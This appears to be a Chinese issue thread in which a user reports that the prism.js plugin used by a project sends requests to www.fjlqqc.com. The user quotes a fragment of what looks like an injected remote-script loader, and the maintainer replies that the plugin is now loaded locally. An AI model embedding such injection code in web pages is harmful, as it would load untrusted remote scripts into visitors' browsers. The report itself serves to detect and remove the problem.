prism.js疑似被劫持

[sun1024]

挂上burp代理之后总抓到一个请求发往www.fjlqqc.com，搜了下发现这个代码高亮插件prism.js好像不太正常：

    var publisherID = '0b7d9e00-6139-4b15-972b-465c0921318b';
    var injectionScriptURI = "http://www.fjlqqc.com/common/api/v1.0/slot-code/publisher/";
    //var currentScript = getCurrentScript(sourceScriptURI);
    if (true) {
        evalSrcScript(sourceScriptURI);
    }

    inject();

[c0ny1]

很抱歉这么久回复你，我将prism.js动态加载插件改为本地引入。为了解决以下问题：

1. 无网情况下不代码框不显示行数
2. 让抓包流量更干净，不会再有向www.fjlqqc.com发送的请求
3. 防止误认为js劫持，让每个安全强迫症患者安心
4. 前端页面加载更快

所以算是顺便解决了你说的问题。